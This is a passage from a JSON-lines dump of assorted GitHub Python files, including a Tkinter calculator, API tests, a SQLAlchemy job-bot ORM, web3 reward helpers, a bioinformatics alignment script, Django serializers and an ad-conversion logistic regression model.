\"power\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_sqrt():\n first_number = e.get()\n e.delete(0, END)\n e.insert(0, int(first_number)**0.5)\n return\n\ndef button_factorial():\n first_number = e.get()\n e.delete(0, END)\n factorial = 1\n if int(first_number) == 0:\n e.insert(0, factorial)\n else:\n for i in range(1,int(first_number) + 1):\n factorial = factorial*i\n e.insert(0, factorial)\n return\n\n\nbutton_1 = Button(root, text = \"1\", padx = 40, pady = 20, command = lambda: button_click(1)).grid(row = 3, column = 0)\nbutton_2 = Button(root, text = \"2\", padx = 40, pady = 20, command = lambda: button_click(2)).grid(row = 3, column = 1)\nbutton_3 = Button(root, text = \"3\", padx = 40, pady = 20, command = lambda: button_click(3)).grid(row = 3, column = 2)\nbutton_4 = Button(root, text = \"4\", padx = 40, pady = 20, command = lambda: button_click(4)).grid(row = 2, column = 0)\nbutton_5 = Button(root, text = \"5\", padx = 40, pady = 20, command = lambda: button_click(5)).grid(row = 2, column = 1)\nbutton_6 = Button(root, text = \"6\", padx = 40, pady = 20, command = lambda: button_click(6)).grid(row = 2, column = 2)\nbutton_7 = Button(root, text = \"7\", padx = 40, pady = 20, command = lambda: button_click(7)).grid(row = 1, column = 0)\nbutton_8 = Button(root, text = \"8\", padx = 40, pady = 20, command = lambda: button_click(8)).grid(row = 1, column = 1)\nbutton_9 = Button(root, text = \"9\", padx = 40, pady = 20, command = lambda: button_click(9)).grid(row = 1, column = 2)\nbutton_0 = Button(root, text = \"0\", padx = 40, pady = 20, command = lambda: button_click(0)).grid(row = 4, column = 1)\n\nadd_button = Button(root, text = \"+\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_add).grid(row = 1, column = 3)\nsub_button = Button(root, text = \"-\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_sub).grid(row = 2, column = 3)\nmul_button = Button(root, text = \"*\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_mul).grid(row = 3, column = 3)\ndiv_button = Button(root, text = \"/\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_div).grid(row = 4, column = 3)\npower_button = Button(root, text = \"x^2\", bg = \"grey\", fg = \"white\", padx = 30, pady = 20, command = button_power).grid(row = 4, column = 0)\nsqrt_button = Button(root, text = \"sqrt\", bg = \"grey\", fg = \"white\", padx = 32, pady = 20, command = button_sqrt).grid(row = 4, column = 2)\nfactorial_button = Button(root, text = \"!\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_factorial).grid(row = 4, column = 3)\n\nequal_button = Button(root, text = \"=\", bg = \"grey\", fg = \"white\", padx = 94, pady = 20, command = button_equal).grid(row = 2, column = 4, columnspan = 2)\nclear_button = Button(root, text = \"CLEAR\", bg = \"grey\", fg = \"white\", padx = 79, pady = 20, command = button_clear).grid(row = 1, column = 4, columnspan =2)\n\n\n#myButton = Button(root, text = \"Enter Your Name!\", command=myClick)\n#myButton.pack()\n\n\nroot.mainloop()\n\n\n\n","repo_name":"sratslla/Tkinter-Calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7554685546","text":"from .utils import TestAPI\n\n\nclass TestAsyncPing(TestAPI):\n \"\"\"Test for users.\"\"\"\n\n def test_ping_one(self):\n \"\"\"Test basic ping access.\"\"\"\n token = self.token\n minion = self.minion\n\n url = '/api/v1.0/tasks/ping/{0}'.format(minion)\n\n # ping one minion\n r, s, h = self.post(url, token_auth=token)\n assert s == 202\n url = h['Location']\n\n while True:\n r, s, h = self.get(url, token_auth=token)\n if s != 202:\n break\n assert s == 200\n assert minion in r\n\n # now invalid minion\n minion = 'inminion_dzakdazdaz'\n url = '/api/v1.0/tasks/ping/{0}'.format(minion)\n r, s, h = self.post(url, token_auth=token)\n assert s == 202\n url = h['Location']\n\n while True:\n r, s, h = self.get(url, token_auth=token)\n if s != 202:\n break\n assert s == 400\n","repo_name":"alkivi-sas/nefario-api","sub_path":"tests/test_async_ping.py","file_name":"test_async_ping.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23689504523","text":"from shared.Util import timed\n\n\n@timed\ndef read():\n file_name = f'input.txt'\n with open(file_name) as input_file:\n return list(input_file.read())\n\n\n@timed\ndef part1(parens):\n print(sum(map(lambda x: 1 if x == '(' else -1, parens)))\n\n\n@timed\ndef part2(parens):\n floor = 0\n for i, paren in enumerate(parens):\n floor += 1 if paren == '(' else -1\n if floor == -1:\n print(i + 1)\n break\n\n\nif __name__ == '__main__':\n paren_list = read()\n part1(paren_list)\n part2(paren_list)\n","repo_name":"TumuGuskun/aoc","sub_path":"aoc-2015/day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26259971584","text":"from sqlalchemy import create_engine, update\nfrom sqlalchemy.orm import Session\n\nfrom database.models import Base, User, Report, Request, Page\n\n\nengine = create_engine(url='postgresql+psycopg2://postgres:1234@localhost/JobsBot', echo=True)\nconn = engine.connect()\n\nBase.metadata.create_all(engine)\n\ndef add_user_to_db(id, user_class, page_class):\n \"\"\"\n Добавляет юзера в бд и устанавливает номер страницы 1\n \"\"\"\n session = Session(bind=engine)\n user = user_class(id=id)\n\n page = page_class(\n current = 1,\n user_id = id\n )\n\n session.add(user)\n session.add(page)\n session.commit()\n\ndef update_current_page(user_id, page_class, page):\n \"\"\"\n Обновляет текущую страницу просмотра прошлых запросов юзера \n \"\"\"\n session = Session(engine)\n current_page = update(page_class).where(page_class.user_id == user_id).values(current = page)\n session.execute(current_page) \n session.commit()\n\ndef is_user_in_db(user_id, user_class):\n \"\"\"\n Проверят наличие юзера в бд\n \"\"\"\n session = Session(bind=engine)\n id = session.query(user_class.id).filter(user_class.id == user_id).first()\n return id == None\n\n\ndef write_request_in_db(data, request_class, user_id, datetime_now):\n \"\"\"\n Записывает запрос поиска работы в бд\n \"\"\"\n session = Session(engine)\n request = request_class(\n id = datetime_now,\n job = data['job'],\n sort = data['sort'],\n page = data['count'],\n user_id = user_id,\n )\n session.add(request)\n session.commit()\n\ndef write_report_in_db(data, report_class, user_id, datetime_now):\n \"\"\"\n Записывает все найденные вакансии запроса в бд\n \"\"\"\n session = Session(engine)\n report = report_class(\n title = data['title'],\n salary = data['salary'],\n description = data['description'],\n link = data['link'],\n request_id = datetime_now,\n user_id = user_id\n )\n session.add(report)\n session.commit()\n\ndef get_current_report_in_db(request_id, report_class, count):\n \"\"\"\n Получает из базы данных текущиую вакансию юзера для добавленияее в закладки\n \"\"\"\n session = Session(engine)\n\n report = session.query(report_class.title,\n report_class.salary,\n report_class.link).filter(report_class.request_id == request_id).limit(count).all()\n \n return report\n\ndef get_request_in_db(user_id, request_class):\n \"\"\"\n Получает все запросы юзера\n \"\"\"\n session = Session(engine)\n requests = session.query(request_class.id).filter(user_id == request_class.user_id).all()\n return requests\n\ndef get_request_job_in_db(user_id, request_class, request_id):\n \"\"\"\n Получает все найденные вакансии по запросу юзера из бд\n \"\"\"\n session = Session(engine)\n info = session.query(request_class.job).filter(user_id == request_class.user_id).filter(request_class.id == request_id).first()\n return info\n\ndef get_current_page_in_db(user_id, page_class):\n \"\"\"\n Получает текущую страницу юзера\n \"\"\"\n session = Session(engine)\n current_page = session.query(page_class.current).filter(user_id == page_class.user_id).first()\n return current_page[0]\n\ndef get_reports_in_db(request_id, report_class):\n \"\"\"\n Получает все вакансии запроса\n \"\"\"\n session = Session(engine)\n reports = session.query(report_class.title, report_class.salary, report_class.link).filter(report_class.request_id == request_id).all()\n return reports\n\ndef get_report_id_in_db(link, report_class):\n \"\"\"\n Получает определенную вакансию по идентифицирующей ссылки\n \"\"\"\n session = Session(engine)\n id = session.query(report_class.id).filter(report_class.link == link).first()\n return id\n\ndef update_report_bookmark_status_in_db(link, report_class, status):\n \"\"\"\n Обновляет статус вакансии в закладках\n \"\"\"\n session = Session(engine)\n bm_status = session.query(report_class).filter(report_class.link == link).first()\n bm_status.is_bookmarked = status\n session.commit()\n\ndef get_marks_reports(user_id, report_class):\n \"\"\"\n Получает вакансии которые в закладках\n \"\"\"\n session = Session(engine)\n reports = session.query(report_class.title, report_class.link).filter(report_class.user_id == user_id).filter(report_class.is_bookmarked == True).all()\n return reports\n","repo_name":"IlyaBulatau/TelegramBotSearchJobs","sub_path":"database/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13167744374","text":"import numpy as np\n\n\"\"\" path \"\"\"\npath = '../data/result.txt'\n\n\"\"\" spatial parameters \"\"\"\ndr = 300\t\t\t# spatial resolution (300 nm per grid)\nx_real = 8000\ny_real = 8000\nz_real = 5000\nr_real = 2000 # radius (nm) of shpere (i.e. origin of meshgrid)\n\n\"\"\" temporal parameters \"\"\"\ndt = 3e-7\t\t\t# temporal resolution\nt_total = 3\t \t\t# total time\nnsteps = int(t_total / dt)\ngamma = 1\t \t# relaxation coefficient\n\n\"\"\" initial orientaion (azimuthal, elevation) \"\"\"\nn_init = [(45 * np.pi / 180), 0]\n\n\"\"\" nematic material parameters (unit: Jm^-3) \"\"\"\nA = -0.172e6\nB = -2.12e6\nC = 1.73e6\n\n\"\"\" one elastic constant approximation (unit: Jm^-1) \"\"\"\nL = 4e-9\n\n\"\"\" substrate & shell anchoring (unit: Jm^-2) \"\"\"\nW_subs = 1e0\nW_shel = 1e-1\n\n\"\"\" Laplacian spacing \"\"\"\ndr_lap = 1e-7\n\n\"\"\" steps per update (50 result only, 500000 real time monitor) \"\"\"\nplot_rate = int(5e5)\nspu = int(3) # deprecated\n\n\"\"\" dimensions \"\"\"\nx_nog = round(x_real / dr)\t# number of grids on x dimension (nog = 27)\ny_nog = round(y_real / dr)\t# number of grids on y dimension (nog = 27)\nz_nog = round(z_real / dr)\t# number of grids on z dimension (nog = 17)\nr_nog = round(r_real / dr) # radius of shpere (unit: number of grids) (nog = 7)\nmesh_shape = (z_nog, y_nog, x_nog)\n\n\"\"\" mesh \"\"\"\ndx = dy = dz = 1\n\naxis_x = np.arange(-x_nog/2+0.5, x_nog/2+0.5, dx)\t\t# (-13 to 13)\naxis_y = np.arange(-y_nog/2+0.5, y_nog/2+0.5, dy)\t\t# (-13 to 13)\naxis_z = np.arange(-z_nog/2+0.5, z_nog/2+0.5, dz)\t\t# ( -8 to 8)\naxis = (axis_z, axis_y, axis_x)\n\n\"\"\" initial and boundary conditions \"\"\"\nS_subs = 0.9\nS_cent = 0.1\nS_init = 0.5\nn_subs = [1, 0, 0]\nn_shel = [1, 0, 0]\nn_bias = [1, 0, 0]\n\n\"\"\" thresholds \"\"\"\nasym_th = 1e-100\ntrace_th = 1e-100\n\n\"\"\" end \"\"\"","repo_name":"yutingshih/LdG-sim","sub_path":"utils/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"20321204788","text":"\"\"\"\nrewards.py: logic for sending transactions and interactions with Reward contract\n\"\"\"\nimport json\nfrom helpers import initializeRewardContract\nimport config\n\n# getNewReward(): gets a new reward for the specified user with the passed in URI\n# returns the token id of the new reward nft\ndef getNewRewardFromChain(user, uri):\n w3, contract, acct = initializeRewardContract(user, './build/contracts/Reward.json')\n\n # Perform transaction, essentially give a new nft to\n tx = contract.functions.requestNewReward(acct.address, uri).buildTransaction({\n 'nonce': w3.eth.getTransactionCount(acct.address)\n })\n signed_tx = w3.eth.account.signTransaction(tx, user['private_key'])\n hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n\n # get the id of the requested reward (return is in hex base 16)\n return int(w3.eth.getTransactionReceipt(hash)['logs']['0']['data'], 16)\n\n# deleteRewardFromChain(): deletes the specified reward id from the chain\ndef deleteRewardFromChain(user, reward_id):\n w3, contract, acct = initializeRewardContract(user, './build/contracts/Reward.json')\n\n # Perform transaction, burn (delete the nft)\n tx = contract.functions.consumeReward(reward_id).buildTransaction({\n 'nonce': w3.eth.getTransactionCount(acct.address)\n })\n signed_tx = w3.eth.account.signTransaction(tx, user['private_key'])\n w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n\n# getRewardURI(): gets the URI associated with a specified reward id\ndef getRewardURI(user, reward_id):\n w3, contract, acct = initializeRewardContract(user, './build/contracts/Reward.json')\n\n # get uri (doesn't require transaction)\n return contract.functions.tokenURI(reward_id).call()","repo_name":"swathi-469/Blockhack","sub_path":"rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5704387701","text":"import os\nimport logging\nfrom logging.config import dictConfig\nimport pathlib\n\nlogs_directory = os.getcwd()+\"/logs\"\npathlib.Path(logs_directory).mkdir(parents=True, exist_ok=True)\n\n\ndef setup_logging():\n logging_config = dict(\n version = 1,\n disable_existing_loggers = True,\n formatters = {\n 'f': {\n 'format':'%(asctime)s %(levelname)-8s %(message)s',\n 'datefmt': \"%Y/%m/%d %H:%M:%S %Z%z\"\n },\n 'simple': {\n 'format': \"%(asctime)s %(process)d %(filename)s %(lineno)s %(levelname)s %(message)s\",\n 'datefmt': \"%Y/%m/%d %H:%M:%S %Z%z\"\n },\n \"extra\": {\n \"format\": \"%(asctime)s %(process)d %(thread)d %(filename)s %(lineno)s %(funcName)s %(levelname)s %(message)s\",\n 'datefmt': \"%Y/%m/%d %H:%M:%S %Z%z\"\n }\n },\n handlers = {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'level': 'DEBUG',\n \"formatter\": \"simple\",\n \"stream\": \"ext://sys.stdout\",\n },\n 'info_file_handler': {\n \"class\": \"logging.handlers.TimedRotatingFileHandler\",\n \"level\": 'INFO',\n \"formatter\": \"extra\",\n \"filename\": logs_directory+\"/event_tracker_info.log\",\n \"when\": \"midnight\",\n \"interval\": 1,\n \"backupCount\": 31,\n \"encoding\": \"utf8\"\n },\n 'error_file_handler': {\n \"class\": \"logging.handlers.TimedRotatingFileHandler\",\n \"level\": 'ERROR',\n \"formatter\": \"extra\",\n \"filename\": logs_directory+\"/event_tracker_errors.log\",\n \"when\": \"midnight\",\n \"interval\": 1,\n \"backupCount\": 31,\n \"encoding\": \"utf8\"\n }\n },\n loggers = {\n \"my_module\": {\n \"level\": \"ERROR\",\n \"handlers\": [\"console\"],\n \"propagate\": \"no\"\n }\n },\n root = {\n \"level\": \"INFO\",\n \"handlers\": [\"console\", \"info_file_handler\", \"error_file_handler\"]\n }\n )\n\n dictConfig(logging_config)\n\n log = logging.getLogger('werkzeug')\n log.setLevel(logging.ERROR)","repo_name":"Akshay2Agarwal/event-tracker","sub_path":"app_logging.py","file_name":"app_logging.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40901028446","text":"#!/usr/bin/env python\n# The MIT License (MIT)\n# https://zenn.dev/sikkim/articles/490f4043230b5a\n\n\nfrom setuptools import setup\n\nDESCRIPTION = '' # Tools description\nNAME = 'pubmed_zenbu'\nAUTHOR = 'Takayuki Suzuki'\nAUTHOR_EMAIL = '' # Suzuki-san's email address\nURL = 'https://github.com/dogrun-inc/pubmed-zenbu'\nLICENSE = '' # MIT License ? \nDOWNLOAD_URL = URL\nVERSION = '' # Version number\nPYTHON_REQUIRES = '>=3.9' \nINSTALL_REQUIRES = [\n 'pytz>=' # This is Timezone library\n]\nPACKAGES = [\n 'pubmed_zenbu'\n]\nKEYWORDS = 'pubmed scraping article dogrun'\nCLASSIFIERS=[\n 'License :: OSI Approved :: MIT License', # MIT License ?\n 'Programming Language :: Python :: 3.9' \n]\nwith open('README.md', 'r', encoding='utf-8') as fp:\n readme = fp.read()\nLONG_DESCRIPTION = readme\nLONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n maintainer=AUTHOR,\n maintainer_email=AUTHOR_EMAIL,\n url=URL,\n download_url=URL,\n packages=PACKAGES,\n classifiers=CLASSIFIERS,\n license=LICENSE,\n keywords=KEYWORDS,\n install_requires=INSTALL_REQUIRES\n)","repo_name":"dogrun-inc/pubmed-zenbu","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30149854157","text":"\"\"\"\r\n\n\nGiven an integer, return `\"odd\"` if the sum of all _odd_ digits is greater\nthan the sum of all _even_ digits. Return `\"even\"` if the sum of _even_ digits\nis greater than the sum of _odd_ digits, and `\"equal\"` if both sums are the\nsame.\n\n### Examples\n\n odds_vs_evens(97428) ➞ \"odd\"\n # odd = 16 (9+7)\n # even = 14 (4+2+8)\n \n odds_vs_evens(81961) ➞ \"even\"\n # odd = 11 (1+9+1)\n # even = 14 (8+6)\n \n odds_vs_evens(54870) ➞ \"equal\"\n # odd = 12 (5+7)\n # even = 12 (4+8+0)\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef odds_vs_evens(num):\n s1 = 0\n s2 = 0\n for ch in str(num):\n if int(ch)%2 ==0:\n s1 += int(ch)\n else:\n s2 += int(ch)\n if s1>s2:\n return 'even'\n if s2>s1:\n return 'odd'\n return 'equal'\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"uWpS5xMjzZFAkiQzL_6.py","file_name":"uWpS5xMjzZFAkiQzL_6.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22412585814","text":"import subprocess\nimport pandas as pd\nimport sys\nimport os.path\nimport os\nfrom joblib import Parallel, delayed\nimport math\n\nif len(sys.argv) ==1:\n print(\"TOO FEW ARGUMENTS... PLEASE ADD SRR_ACC_LIST.TXT FILE\")\n sys.exit(-1)\nelif len(sys.argv) >2:\n print(\"TOO MANY ARGUMENTS... IGNORING EXTRA ARGUMENTS...\")\n \nif os.path.isfile(sys.argv[1]) == False:\n print(\"SRR FILE NOT FOUND... EXITING...\") \n sys.exit(-2)\n\ncwd = (str(os.getcwd()) + '/')\nprint(cwd)\nprint(\"PROGRAM RUNNING...\")\n\ndf= pd.read_csv(sys.argv[1],header=None)\nsras = df[0].tolist()\n\n#build index (hash out if previously done)\nos.system(\"/home/ubuntu/project/rnaseq/student_tools/STAR-2.5.2a/bin/Linux_x86_64/STAR --runThreadN 8 --runMode genomeGenerate \\\n --genomeDir ./STAR_index --genomeFastaFiles /home/ubuntu/project/rnaseq/refs/ref_index/GCA_000349665_1.fasta \\\n --sjdbGTFfile /home/ubuntu/project/rnaseq/refs/Mesocricetus_auratus.MesAur1.0.104.gtf--sjdbOverhang 99\")\n\nfor sra in sras:\n print(\"Aligning \" + sra)\n y =\"STAR --runThreadN 31 --genomeDir /home/ubuntu/project/rnaseq/STAR_INDEX --limitGenomeGenerateRAM 120000000000 --readFilesIn /home/ubuntu/project/rnaseq/data/fasta/trimmed/\"+ sra +\"_1_val_1.fq.gz /home/ubuntu/project/rnaseq/data/fasta/trimmed/\" + sra +\"_2_val_2.fq.gz --readFilesCommand zcat --outSAMtype BAM SortedByCoordinate --quantMode GeneCounts --outFileNamePrefix /home/ubuntu/project/rnaseq/STAR_ALIGNMENT/\"+ sra\n os.system(y)\n print(\"Successfully aligned \" + sra)\n continue\n","repo_name":"austinu17/BMI_5710","sub_path":"Python_Scripts/STAR_Align.py","file_name":"STAR_Align.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30050563567","text":"\"\"\"\r\n\n\nHarry is a postman. He's got a post office with a size of `n*m(a matrix / 2D\nlist)`. Each slot at the 2D list represents the number of letters in that\nspot. Harry can only go right and down. He starts at (0, 0), and ends at (n-1,\nm-1). `n` represents the height, and `m` the length. Return the maximum amount\nof letters he can pick up. He can only pick up letters if he is on that spot.\n\n### Examples\n\n harry([[5, 2], [5, 2]]) ➞ 12\n # (5+5+2)\n harry([\n [1, 2, 3, 4, 5],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15]\n ]) ➞ 72\n # (1+6+11+12+13+14+15)\n harry([[]]) ➞ -1\n\n### Notes\n\nLike you saw in example 3, if the matrix is empty, return `-1`.\n\n\"\"\"\r\n\ndef harry(po):\n n, m = len(po), len(po[0])\n if n == 0 or m == 0:\n return -1\n if n == 1 and m == 1:\n return po[0][0]\n for c in range(1, m):\n po[0][c] += po[0][c-1]\n for r in range(1, n):\n po[r][0] += po[r-1][0]\n for r in range(1, n):\n for c in range(1, m):\n po[r][c] += max(po[r-1][c], po[r][c-1])\n return po[-1][-1]\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"7yo5FJX4xFbNxim5q_4.py","file_name":"7yo5FJX4xFbNxim5q_4.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11492963903","text":"from django.db import transaction\n\nfrom MainApp.models import CierreCaja, DetalleCierre\nfrom rest_framework import serializers\n\nfrom MainApp.serializers import CajaSerializer\nfrom MainApp.serializers.detalle_cierre import DetalleCierreSerializer\nfrom MainApp.serializers.user import UserNameSerializer\n\n\nclass CierreCajaSerializer(serializers.ModelSerializer):\n detalle = DetalleCierreSerializer(many=True)\n # caja = CajaSerializer()\n\n class Meta:\n model = CierreCaja\n fields = ('id', 'caja', 'usuario', 'apertura', 'cierre', 'vendido', 'diferencia',\n 'vendido_costo', 'creado', 'modificado', 'detalle')\n\n @transaction.atomic\n def create(self, validated_data):\n # extraemos detalles del movimiento\n detalle_data = validated_data.pop('detalle')\n\n # creamos el movimiento\n cierre = CierreCaja.objects.create(**validated_data)\n\n # # creamos los detalles del movimiento\n for detalle_data in detalle_data:\n DetalleCierre.objects.create(cierre=cierre, **detalle_data)\n\n return cierre\n\nclass CierreCajaVerifySerializer(serializers.ModelSerializer):\n detalle = DetalleCierreSerializer(many=True)\n # caja = CajaSerializer()\n\n class Meta:\n model = CierreCaja\n fields = ('id', 'caja', 'usuario', 'apertura', 'cierre', 'vendido', 'diferencia',\n 'vendido_costo', 'creado', 'modificado', 'detalle', 'activo')\n\nclass CierreCajaUpdateSerializer(serializers.ModelSerializer):\n # detalle = DetalleCierreSerializer(many=True)\n\n class Meta:\n model = CierreCaja\n fields = ('id', 'caja', 'usuario', 'apertura', 'cierre', 'vendido', 'diferencia',\n 'vendido_costo', 'activo')\n\n\nclass CierreCajaListadoSerializer(serializers.ModelSerializer):\n caja = CajaSerializer()\n usuario = UserNameSerializer()\n costo_vendido = serializers.DecimalField(default=0, max_digits=18, decimal_places=2, required=False)\n\n class Meta:\n model = CierreCaja\n fields = ('id', 'caja', 'usuario', 'apertura', 'cierre', 'vendido', 'diferencia',\n 'vendido_costo', 'creado', 'modificado', 'costo_vendido')\n","repo_name":"CoriAle/app","sub_path":"MainApp/serializers/cierre_caja.py","file_name":"cierre_caja.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22798563157","text":"data=open(\"data.txt\",\"r\")\nquestions=data.read()\nques=questions.split('\\n')\nwhile 1:\n word=input(\"Enter your query word:\")\n word=word.lower()\n if(word=='quit'):\n break\n for i in ques:\n if word in i:\n print(ques[ques.index(i)+1])\n break","repo_name":"nabinadhikariofficial/BCTLab","sub_path":"Artificial Intelligence/faq.py","file_name":"faq.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71931269211","text":"#Logistic model on Ad Purchase Conversions\n#This is to create a logistics learning model on whether a user will download the advertised app after clicking into the ad\n#In this version, we will estimate the model using Scikit-Learn\n#Date parsing coding contributed by Jason Ip (not owner) \n\n##############\n\nimport csv\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cross_validation import train_test_split\n\n#load training dataset at 300,000 rows at a time\n\nCHUNKSIZE = 300000\nreader = pd.read_csv('C:/Users/Tony Cai/Documents/Ad Prediction/train.csv', header=0, engine='c', chunksize=CHUNKSIZE)\n\ndata = pd.DataFrame()\n\nfor chunk in reader:\n data = data.append(chunk)\n\n#Creating Year, Month and Day Columns\ndata['Year2'] = data['click_time'].str[:4]\ndata['Month2'] = data['click_time'].str[5:7]\ndata['Day2'] = data['click_time'].str[8:10]\ndata['hour2'] = data['click_time'].str[11:13]\ndata['minute2'] = data['click_time'].str[14:16]\ndata['second2'] = data['click_time'].str[17:19]\n\n#Delete click time and attributed time columns \ndel data['click_time']\ndel data['attributed_time']\n\n#Turn year, month and day columns from str to int\ndata['Year']=data['Year2'].astype(int)*1\ndata['Month']=data['Month2'].astype(int)*1\ndata['Day']=data['Day2'].astype(int)*1\ndata['Hour']=data['hour2'].astype(int)*1\ndata['Minute']=data['minute2'].astype(int)*1\ndata['Second']=data['second2'].astype(int)*1\ndel data['Year2']\ndel data['Month2']\ndel data['hour2']\ndel data['Day2']\ndel data['minute2']\ndel data['second2']\n\n#Overview of size of dataframe\nprint(data.shape)\nprint(list(data.columns))\n\n#Looks at headers of dataframe\ndata.head\n\nX_cols = ['ip', 'app', 'device', 'os', 'channel', 'Day', 'Hour', 'Minute', 'Second']\n\n#Model estiamtion\n\n#Create an array to house coefficients\ncoefficients = pd.DataFrame(columns = X_cols)\nintercepts = pd.DataFrame(columns = ['intercept'])\n\n#Estimate model parameters by repeatedly randomly sampling 80% of training set to estimate model and average out resulting parameters \nsimulation_iterations = 10\n\nfor i in range(1, simulation_iterations+1):\n \n #split training set by 70% train and 30% validation\n train, test = train_test_split(data, test_size=0.3)\n X_train = train[X_cols]\n Y_train = train['is_attributed']\n \n #train logistic model for said instance\n logreg = LogisticRegression()\n logreg.fit(X_train, Y_train)\n \n #collecting/storing model parameters\n coefficients = coefficients.append(pd.DataFrame(logreg.coef_, columns = X_cols), ignore_index=True)\n intercepts = intercepts.append(pd.DataFrame(logreg.intercept_, columns = ['intercept']), ignore_index=True)\n\n#Estimating parameters for the model by averaging the coefficients from repeated testing\nmodel_param = coefficients.mean(axis=0)\nintercept = float(intercepts.mean(axis=0))\n\nparam = tuple(model_param)\n\nprint(model_param)\n\n#########\n\n#Prediction of Test data\n\n#Define Logistic Function for prediction\n\ndef logit(z):\n return 1/(1+np.exp(-1*z))\n\n#load test data at 300,000 rows at a time\n\ntest_reader = pd.read_csv('C:/Users/Tony Cai/Documents/Ad Prediction/test.csv', header=0, engine='c', chunksize=CHUNKSIZE)\n\ntest_data = pd.DataFrame()\n\nfor chunk in test_reader:\n test_data = test_data.append(chunk)\n\n#Creating Year, Month and Day Columns\ntest_data['Year2'] = test_data['click_time'].str[:4]\ntest_data['Month2'] = test_data['click_time'].str[5:7]\ntest_data['Day2'] = test_data['click_time'].str[8:10]\ntest_data['hour2'] = test_data['click_time'].str[11:13]\ntest_data['minute2'] = test_data['click_time'].str[14:16]\ntest_data['second2'] = test_data['click_time'].str[17:19]\n\n#Delete click time and attributed time columns \ndel test_data['click_time']\n\n#Turn year, month and day columns from str to int\ntest_data['Year']=test_data['Year2'].astype(int)*1\ntest_data['Month']=test_data['Month2'].astype(int)*1\ntest_data['Day']=test_data['Day2'].astype(int)*1\ntest_data['Hour']=test_data['hour2'].astype(int)*1\ntest_data['Minute']=test_data['minute2'].astype(int)*1\ntest_data['Second']=test_data['second2'].astype(int)*1\ndel test_data['Year2']\ndel test_data['Month2']\ndel test_data['hour2']\ndel test_data['Day2']\ndel test_data['minute2']\ndel test_data['second2']\n\n#Create dataframe to store predicted values\n\npred = pd.DataFrame()\n\n#Create an matrix for test inputs\ntest_input = np.asmatrix(test_data[X_cols].values)\n\n#Calculation of predicted values\nz = np.add(np.matmul(test_input, param),intercept)\npredicted_values = logit(z)\n\n#create submission file\n\n#create results array\nclick_id = pd.DataFrame(test_data['click_id'], columns = ['click_id'])\n\npredicted_values = predicted_values.transpose(1,0)\npredicted_values = np.asarray(predicted_values)\npredicted = np.asarray(tuple(predicted_values))\npred = pd.DataFrame(predicted, columns = ['is_attributed'])\n\nresults = pd.concat([click_id, pred], axis = 1)\n\n\n#Publish results as CSV\n\nwith open('C:/Users/Tony Cai/Documents/Ad Prediction/submission.csv','w') as output:\n writer = csv.writer(output, lineterminator='\\n')\n writer.writerows([['click_id','is_attributed']])\n writer.writerows(results.values)\n \n\n\n","repo_name":"epzilonzigma/ML_Practice","sub_path":"TalkingData AdTracking Fraud Detection Challenge/Python Script.py","file_name":"Python Script.py","file_ext":"py","file_size_in_byte":5153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16773614049","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom IPython.core.display import display, HTML\ndisplay(HTML(\"\"))\n\n\n# # Question1.What exactly is the business problem you are trying to solve? Summarize this in the form of a meaningful problem statement? \n\n# ## Determining the category or variety of grape used in making wines based on several chemical characteristics of individual wines\n\n# # Problem Statement\n\n# ## Predicting the category or variety of grape used in making wines based on the 